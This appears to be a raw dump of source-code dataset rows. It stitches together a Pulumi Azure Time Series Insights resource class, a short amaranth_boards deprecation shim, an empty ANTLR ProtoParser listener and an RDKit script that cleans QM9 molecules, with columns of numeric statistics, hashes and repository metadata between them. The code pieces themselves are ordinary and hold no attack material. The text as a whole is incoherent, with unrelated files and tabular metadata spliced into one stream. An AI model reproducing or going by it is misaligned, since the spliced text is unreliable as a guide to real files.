            resource_group_name=example_resource_group.name,
            partition_count=2,
            message_retention=7)
        example_consumer_group = azure.eventhub.ConsumerGroup("exampleConsumerGroup",
            namespace_name=example_event_hub_namespace.name,
            eventhub_name=example_event_hub.name,
            resource_group_name=example_resource_group.name)
        example_authorization_rule = azure.eventhub.AuthorizationRule("exampleAuthorizationRule",
            namespace_name=example_event_hub_namespace.name,
            eventhub_name=example_event_hub.name,
            resource_group_name=example_resource_group.name,
            listen=True,
            send=False,
            manage=False)
        example_account = azure.storage.Account("exampleAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            account_tier="Standard",
            account_replication_type="LRS")
        example_time_series_insights_gen2_environment = azure.iot.TimeSeriesInsightsGen2Environment("exampleTimeSeriesInsightsGen2Environment",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku_name="L1",
            id_properties=["id"],
            storage=azure.iot.TimeSeriesInsightsGen2EnvironmentStorageArgs(
                name=example_account.name,
                key=example_account.primary_access_key,
            ))
        example_time_series_insights_event_source_eventhub = azure.iot.TimeSeriesInsightsEventSourceEventhub("exampleTimeSeriesInsightsEventSourceEventhub",
            location=example_resource_group.location,
            environment_id=example_time_series_insights_gen2_environment.id,
            eventhub_name=example_event_hub.name,
            namespace_name=example_event_hub_namespace.name,
            shared_access_key=example_authorization_rule.primary_key,
            shared_access_key_name=example_authorization_rule.name,
            consumer_group_name=example_consumer_group.name,
            event_source_resource_id=example_event_hub.id)
        ```

        ## Import

        Azure IoT Time Series Insights EventHub Event Source can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:iot/timeSeriesInsightsEventSourceEventhub:TimeSeriesInsightsEventSourceEventhub example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/example/providers/Microsoft.TimeSeriesInsights/environments/environment1/eventSources/example
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] consumer_group_name: Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
        :param pulumi.Input[str] environment_id: Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to be created.
        :param pulumi.Input[str] event_source_resource_id: Specifies the resource id where events will be coming from.
        :param pulumi.Input[str] eventhub_name: Specifies the name of the EventHub which will be associated with this resource.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
        :param pulumi.Input[str] namespace_name: Specifies the EventHub Namespace name.
        :param pulumi.Input[str] shared_access_key: Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
        :param pulumi.Input[str] shared_access_key_name: Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] timestamp_property_name: Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: TimeSeriesInsightsEventSourceEventhubArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages an Azure IoT Time Series Insights EventHub Event Source.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_event_hub_namespace = azure.eventhub.EventHubNamespace("exampleEventHubNamespace",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku="Standard")
        example_event_hub = azure.eventhub.EventHub("exampleEventHub",
            namespace_name=example_event_hub_namespace.name,
            resource_group_name=example_resource_group.name,
            partition_count=2,
            message_retention=7)
        example_consumer_group = azure.eventhub.ConsumerGroup("exampleConsumerGroup",
            namespace_name=example_event_hub_namespace.name,
            eventhub_name=example_event_hub.name,
            resource_group_name=example_resource_group.name)
        example_authorization_rule = azure.eventhub.AuthorizationRule("exampleAuthorizationRule",
            namespace_name=example_event_hub_namespace.name,
            eventhub_name=example_event_hub.name,
            resource_group_name=example_resource_group.name,
            listen=True,
            send=False,
            manage=False)
        example_account = azure.storage.Account("exampleAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            account_tier="Standard",
            account_replication_type="LRS")
        example_time_series_insights_gen2_environment = azure.iot.TimeSeriesInsightsGen2Environment("exampleTimeSeriesInsightsGen2Environment",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku_name="L1",
            id_properties=["id"],
            storage=azure.iot.TimeSeriesInsightsGen2EnvironmentStorageArgs(
                name=example_account.name,
                key=example_account.primary_access_key,
            ))
        example_time_series_insights_event_source_eventhub = azure.iot.TimeSeriesInsightsEventSourceEventhub("exampleTimeSeriesInsightsEventSourceEventhub",
            location=example_resource_group.location,
            environment_id=example_time_series_insights_gen2_environment.id,
            eventhub_name=example_event_hub.name,
            namespace_name=example_event_hub_namespace.name,
            shared_access_key=example_authorization_rule.primary_key,
            shared_access_key_name=example_authorization_rule.name,
            consumer_group_name=example_consumer_group.name,
            event_source_resource_id=example_event_hub.id)
        ```

        ## Import

        Azure IoT Time Series Insights EventHub Event Source can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:iot/timeSeriesInsightsEventSourceEventhub:TimeSeriesInsightsEventSourceEventhub example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/example/providers/Microsoft.TimeSeriesInsights/environments/environment1/eventSources/example
        ```

        :param str resource_name: The name of the resource.
        :param TimeSeriesInsightsEventSourceEventhubArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads: if an Args object was supplied,
        # expand its fields into keyword arguments for _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(TimeSeriesInsightsEventSourceEventhubArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 consumer_group_name: Optional[pulumi.Input[str]] = None,
                 environment_id: Optional[pulumi.Input[str]] = None,
                 event_source_resource_id: Optional[pulumi.Input[str]] = None,
                 eventhub_name: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 namespace_name: Optional[pulumi.Input[str]] = None,
                 shared_access_key: Optional[pulumi.Input[str]] = None,
                 shared_access_key_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 timestamp_property_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """Shared constructor body: validate options, build the props bag, and register the resource."""
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: __props__ must not be caller-supplied,
            # and required properties are enforced unless adopting by URN.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = TimeSeriesInsightsEventSourceEventhubArgs.__new__(TimeSeriesInsightsEventSourceEventhubArgs)

            if consumer_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'consumer_group_name'")
            __props__.__dict__["consumer_group_name"] = consumer_group_name
            if environment_id is None and not opts.urn:
                raise TypeError("Missing required property 'environment_id'")
            __props__.__dict__["environment_id"] = environment_id
            if event_source_resource_id is None and not opts.urn:
                raise TypeError("Missing required property 'event_source_resource_id'")
            __props__.__dict__["event_source_resource_id"] = event_source_resource_id
            if eventhub_name is None and not opts.urn:
                raise TypeError("Missing required property 'eventhub_name'")
            __props__.__dict__["eventhub_name"] = eventhub_name
            __props__.__dict__["location"] = location
            __props__.__dict__["name"] = name
            if namespace_name is None and not opts.urn:
                raise TypeError("Missing required property 'namespace_name'")
            __props__.__dict__["namespace_name"] = namespace_name
            if shared_access_key is None and not opts.urn:
                raise TypeError("Missing required property 'shared_access_key'")
            __props__.__dict__["shared_access_key"] = shared_access_key
            if shared_access_key_name is None and not opts.urn:
                raise TypeError("Missing required property 'shared_access_key_name'")
            __props__.__dict__["shared_access_key_name"] = shared_access_key_name
            __props__.__dict__["tags"] = tags
            __props__.__dict__["timestamp_property_name"] = timestamp_property_name
        super(TimeSeriesInsightsEventSourceEventhub, __self__).__init__(
            'azure:iot/timeSeriesInsightsEventSourceEventhub:TimeSeriesInsightsEventSourceEventhub',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            consumer_group_name: Optional[pulumi.Input[str]] = None,
            environment_id: Optional[pulumi.Input[str]] = None,
            event_source_resource_id: Optional[pulumi.Input[str]] = None,
            eventhub_name: Optional[pulumi.Input[str]] = None,
            location: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            namespace_name: Optional[pulumi.Input[str]] = None,
            shared_access_key: Optional[pulumi.Input[str]] = None,
            shared_access_key_name: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            timestamp_property_name: Optional[pulumi.Input[str]] = None) -> 'TimeSeriesInsightsEventSourceEventhub':
        """
        Get an existing TimeSeriesInsightsEventSourceEventhub resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] consumer_group_name: Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
        :param pulumi.Input[str] environment_id: Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to be created.
        :param pulumi.Input[str] event_source_resource_id: Specifies the resource id where events will be coming from.
        :param pulumi.Input[str] eventhub_name: Specifies the name of the EventHub which will be associated with this resource.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
        :param pulumi.Input[str] namespace_name: Specifies the EventHub Namespace name.
        :param pulumi.Input[str] shared_access_key: Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
        :param pulumi.Input[str] shared_access_key_name: Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] timestamp_property_name: Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
        """
        # Merging in the id makes the base constructor perform a read of the
        # existing resource instead of creating a new one.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _TimeSeriesInsightsEventSourceEventhubState.__new__(_TimeSeriesInsightsEventSourceEventhubState)

        __props__.__dict__["consumer_group_name"] = consumer_group_name
        __props__.__dict__["environment_id"] = environment_id
        __props__.__dict__["event_source_resource_id"] = event_source_resource_id
        __props__.__dict__["eventhub_name"] = eventhub_name
        __props__.__dict__["location"] = location
        __props__.__dict__["name"] = name
        __props__.__dict__["namespace_name"] = namespace_name
        __props__.__dict__["shared_access_key"] = shared_access_key
        __props__.__dict__["shared_access_key_name"] = shared_access_key_name
        __props__.__dict__["tags"] = tags
        __props__.__dict__["timestamp_property_name"] = timestamp_property_name
        return TimeSeriesInsightsEventSourceEventhub(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="consumerGroupName")
    def consumer_group_name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
        """
        return pulumi.get(self, "consumer_group_name")

    @property
    @pulumi.getter(name="environmentId")
    def environment_id(self) -> pulumi.Output[str]:
        """
        Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "environment_id")

    @property
    @pulumi.getter(name="eventSourceResourceId")
    def event_source_resource_id(self) -> pulumi.Output[str]:
        """
        Specifies the resource id where events will be coming from.
        """
        return pulumi.get(self, "event_source_resource_id")

    @property
    @pulumi.getter(name="eventhubName")
    def eventhub_name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the EventHub which will be associated with this resource.
        """
        return pulumi.get(self, "eventhub_name")

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="namespaceName")
    def namespace_name(self) -> pulumi.Output[str]:
        """
        Specifies the EventHub Namespace name.
        """
        return pulumi.get(self, "namespace_name")

    @property
    @pulumi.getter(name="sharedAccessKey")
    def shared_access_key(self) -> pulumi.Output[str]:
        """
        Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
        """
        return pulumi.get(self, "shared_access_key")

    @property
    @pulumi.getter(name="sharedAccessKeyName")
    def shared_access_key_name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
        """
        return pulumi.get(self, "shared_access_key_name")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="timestampPropertyName")
    def timestamp_property_name(self) -> pulumi.Output[str]:
        """
        Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
        """
        return pulumi.get(self, "timestamp_property_name")
| 51.832215
| 279
| 0.690017
| 4,602
| 38,615
| 5.546284
| 0.051282
| 0.068955
| 0.079533
| 0.059473
| 0.916392
| 0.905971
| 0.896019
| 0.878311
| 0.871141
| 0.8626
| 0
| 0.002778
| 0.226259
| 38,615
| 744
| 280
| 51.901882
| 0.851496
| 0.424757
| 0
| 0.720627
| 1
| 0
| 0.126054
| 0.050781
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16188
| false
| 0.002611
| 0.013055
| 0
| 0.27154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f327e1178ad3751f0d7c9636420c8cac8f41a20d
| 278
|
py
|
Python
|
nmigen_boards/qmtech_daughterboard.py
|
hansfbaier/amaranth-boards
|
a3e92db69e74cc18a42808f6f72068f05efe018e
|
[
"BSD-2-Clause"
] | 1
|
2022-01-22T20:23:07.000Z
|
2022-01-22T20:23:07.000Z
|
nmigen_boards/qmtech_daughterboard.py
|
amaranth-community-unofficial/amaranth-boards
|
eacb18700d0ed97f525737ca80d923ebd5851505
|
[
"BSD-2-Clause"
] | null | null | null |
nmigen_boards/qmtech_daughterboard.py
|
amaranth-community-unofficial/amaranth-boards
|
eacb18700d0ed97f525737ca80d923ebd5851505
|
[
"BSD-2-Clause"
] | null | null | null |
# Deprecated compatibility shim: re-exports the renamed amaranth_boards module
# and warns callers to migrate off the old nmigen_boards import path.
import warnings

from amaranth_boards.qmtech_daughterboard import *  # noqa: F401,F403
from amaranth_boards.qmtech_daughterboard import __all__  # noqa: F401

warnings.warn(
    "instead of nmigen_boards.qmtech_daughterboard, use amaranth_boards.qmtech_daughterboard",
    DeprecationWarning,
    stacklevel=2,
)
| 39.714286
| 104
| 0.834532
| 31
| 278
| 7.096774
| 0.516129
| 0.218182
| 0.454545
| 0.45
| 0.390909
| 0.390909
| 0
| 0
| 0
| 0
| 0
| 0.004065
| 0.115108
| 278
| 7
| 105
| 39.714286
| 0.890244
| 0
| 0
| 0
| 0
| 0
| 0.311828
| 0.25448
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b8a3d281f09a3078b19ad1dadbdf5feb56bf81cd
| 8,201
|
py
|
Python
|
bin/protobuf/ProtoParserListener.py
|
vak/protobuf2uml
|
537db478e34fc34e39dec1fd0a47b27730a6f9b4
|
[
"Apache-2.0"
] | 28
|
2015-01-08T12:12:16.000Z
|
2021-02-26T20:01:56.000Z
|
bin/protobuf/ProtoParserListener.py
|
vak/protobuf2uml
|
537db478e34fc34e39dec1fd0a47b27730a6f9b4
|
[
"Apache-2.0"
] | 5
|
2015-01-31T00:26:38.000Z
|
2020-10-05T14:55:05.000Z
|
bin/protobuf/ProtoParserListener.py
|
vak/protobuf2uml
|
537db478e34fc34e39dec1fd0a47b27730a6f9b4
|
[
"Apache-2.0"
] | 16
|
2015-03-13T14:47:17.000Z
|
2021-07-18T16:20:14.000Z
|
# Generated from java-escape by ANTLR 4.4
from antlr4 import *
# This class defines a complete listener for a parse tree produced by ProtoParser.
class ProtoParserListener(ParseTreeListener):
# Enter a parse tree produced by ProtoParser#all_identifier.
def enterAll_identifier(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#all_identifier.
def exitAll_identifier(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#rpc_name.
def enterRpc_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#rpc_name.
def exitRpc_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#ext_name.
def enterExt_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#ext_name.
def exitExt_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_value_item.
def enterOption_value_item(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_value_item.
def exitOption_value_item(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#service_name.
def enterService_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#service_name.
def exitService_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#all_value.
def enterAll_value(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#all_value.
def exitAll_value(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_content.
def enterMessage_content(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_content.
def exitMessage_content(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#service_content.
def enterService_content(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#service_content.
def exitService_content(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#import_file_name.
def enterImport_file_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#import_file_name.
def exitImport_file_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#enum_name.
def enterEnum_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#enum_name.
def exitEnum_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_def.
def enterMessage_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_def.
def exitMessage_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#resp_name.
def enterResp_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#resp_name.
def exitResp_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#import_def.
def enterImport_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#import_def.
def exitImport_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#service_def.
def enterService_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#service_def.
def exitService_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_value_object.
def enterOption_value_object(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_value_object.
def exitOption_value_object(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#enum_item_def.
def enterEnum_item_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#enum_item_def.
def exitEnum_item_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#enum_def.
def enterEnum_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#enum_def.
def exitEnum_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_name.
def enterOption_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_name.
def exitOption_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#req_name.
def enterReq_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#req_name.
def exitReq_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#package_name.
def enterPackage_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#package_name.
def exitPackage_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#rpc_def.
def enterRpc_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#rpc_def.
def exitRpc_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#ext_def.
def enterExt_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#ext_def.
def exitExt_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#ext_content.
def enterExt_content(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#ext_content.
def exitExt_content(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_line_def.
def enterOption_line_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_line_def.
def exitOption_line_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#proto.
def enterProto(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#proto.
def exitProto(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_ext_def.
def enterMessage_ext_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_ext_def.
def exitMessage_ext_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#package_def.
def enterPackage_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#package_def.
def exitPackage_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_field_item.
def enterOption_field_item(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_field_item.
def exitOption_field_item(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#proto_type.
def enterProto_type(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#proto_type.
def exitProto_type(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#literal_value.
def enterLiteral_value(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#literal_value.
def exitLiteral_value(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_all_value.
def enterOption_all_value(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_all_value.
def exitOption_all_value(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#option_field_def.
def enterOption_field_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#option_field_def.
def exitOption_field_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_name.
def enterMessage_name(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_name.
def exitMessage_name(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#message_item_def.
def enterMessage_item_def(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#message_item_def.
def exitMessage_item_def(self, ctx):
pass
# Enter a parse tree produced by ProtoParser#enum_content.
def enterEnum_content(self, ctx):
pass
# Exit a parse tree produced by ProtoParser#enum_content.
def exitEnum_content(self, ctx):
pass
| 25.468944
| 82
| 0.683819
| 1,113
| 8,201
| 4.880503
| 0.068284
| 0.078424
| 0.130707
| 0.235272
| 0.842415
| 0.827688
| 0.821981
| 0.821981
| 0.819956
| 0.741348
| 0
| 0.000491
| 0.255335
| 8,201
| 321
| 83
| 25.548287
| 0.88898
| 0.487867
| 0
| 0.492958
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.492958
| false
| 0.492958
| 0.035211
| 0
| 0.535211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 11
|
b2640457a643106db8db8ea46c7c4e7929ae44ad
| 4,207
|
py
|
Python
|
preprocessing/clean_qm9.py
|
olsson-group/transBG
|
046adb33ef50fb54981e344cbb09411f7e53d80a
|
[
"MIT"
] | null | null | null |
preprocessing/clean_qm9.py
|
olsson-group/transBG
|
046adb33ef50fb54981e344cbb09411f7e53d80a
|
[
"MIT"
] | null | null | null |
preprocessing/clean_qm9.py
|
olsson-group/transBG
|
046adb33ef50fb54981e344cbb09411f7e53d80a
|
[
"MIT"
] | null | null | null |
from rdkit.Chem import PandasTools
import pandas as pd
import os
from rdkit import Chem
import numpy as np
cwd = os.getcwd()
dataset_path = os.path.join(cwd, "datasets/QM9/qm9/gdb9.sdf")
i_mol = 0
atom_types = []
edge_types = []
formal_charges_types = []
max_atoms = 0
max_edges = 0
total_mol = 0
unused_mol = []
for mol in Chem.SDMolSupplier(dataset_path, removeHs = False, sanitize = True):
total_mol += 1
if mol != None:
# Check if the biggest molecule fragment has more tham 1 atom
mol = Chem.rdmolops.GetMolFrags(mol, asMols = True) #Choose biggest fragment if several
aux_f = lambda i: mol[i].GetNumAtoms()
sub_mol_idx = max( range(len(mol)), key = aux_f )
mol = mol[sub_mol_idx]
if mol.GetNumAtoms() < 2:
unused_mol.append(total_mol - 1)
continue
#Get the atoms of the molecule
atoms = []
formal_charges = []
edges = []
for atom in mol.GetAtoms():
atoms.append(atom.GetAtomicNum())
formal_charges.append( atom.GetFormalCharge() )
for edge in mol.GetBonds():
edges.append(edge.GetBondTypeAsDouble())
new_atom_types = list(np.setdiff1d(atoms, atom_types))
if new_atom_types != []:
atom_types.extend(new_atom_types)
new_formal_charges = list(np.setdiff1d(formal_charges, formal_charges_types))
if new_formal_charges != []:
formal_charges_types.extend(new_formal_charges)
new_edge_types = list(np.setdiff1d(edges, edge_types))
if new_edge_types != []:
edge_types.extend(new_edge_types)
if max_atoms < mol.GetNumAtoms():
max_atoms = mol.GetNumAtoms()
else:
unused_mol.append(total_mol - 1)
print(atom_types, flush = True)
print(formal_charges_types, flush = True)
print(max_atoms, flush = True)
print(edge_types, flush = True)
print(len(unused_mol), flush = True)
print(total_mol, flush = True)
clean_sdf = os.path.join(cwd, "datasets/QM9/qm9/clean_gdb9.sdf")
#Cleaning
frame = PandasTools.LoadSDF(dataset_path, removeHs = False)
#frame.drop(frame.index[unused_mol], inplace = True)
indexes_to_keep = set(range(frame.shape[0])) - set(unused_mol)
clean_frame = frame.take( list(indexes_to_keep) )
PandasTools.WriteSDF(clean_frame, clean_sdf)
#Check that the procedure worked
i_mol = 0
atom_types = []
edge_types = []
formal_charges_types = []
max_atoms = 0
max_edges = 0
total_mol = 0
unused_mol = []
for mol in Chem.SDMolSupplier(clean_sdf, removeHs = False, sanitize = True):
total_mol += 1
if mol != None:
# Check if the biggest molecule fragment has more tham 1 atom
mol = Chem.rdmolops.GetMolFrags(mol, asMols = True) #Choose biggest fragment if several
aux_f = lambda i: mol[i].GetNumAtoms()
sub_mol_idx = max( range(len(mol)), key = aux_f )
mol = mol[sub_mol_idx]
if mol.GetNumAtoms() < 2:
unused_mol.append(total_mol - 1)
continue
#Get the atoms of the molecule
atoms = []
formal_charges = []
edges = []
for atom in mol.GetAtoms():
atoms.append(atom.GetAtomicNum())
formal_charges.append( atom.GetFormalCharge() )
for edge in mol.GetBonds():
edges.append(edge.GetBondTypeAsDouble())
new_atom_types = list(np.setdiff1d(atoms, atom_types))
if new_atom_types != []:
atom_types.extend(new_atom_types)
new_formal_charges = list(np.setdiff1d(formal_charges, formal_charges_types))
if new_formal_charges != []:
formal_charges_types.extend(new_formal_charges)
new_edge_types = list(np.setdiff1d(edges, edge_types))
if new_edge_types != []:
edge_types.extend(new_edge_types)
if max_atoms < mol.GetNumAtoms():
max_atoms = mol.GetNumAtoms()
else:
unused_mol.append(total_mol - 1)
print(atom_types, flush = True)
print(formal_charges_types, flush = True)
print(max_atoms, flush = True)
print(edge_types, flush = True)
print(len(unused_mol), flush = True)
print(total_mol, flush = True)
print()
| 28.234899
| 95
| 0.649869
| 562
| 4,207
| 4.631673
| 0.176157
| 0.099885
| 0.059163
| 0.043796
| 0.846715
| 0.846715
| 0.846715
| 0.82597
| 0.82597
| 0.82597
| 0
| 0.009758
| 0.24483
| 4,207
| 149
| 96
| 28.234899
| 0.809569
| 0.079629
| 0
| 0.854369
| 0
| 0
| 0.014497
| 0.014497
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.048544
| 0
| 0.048544
| 0.126214
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b26ff313e2782db44fb08e8f44a0c4c2543c5bf9
| 27,924
|
py
|
Python
|
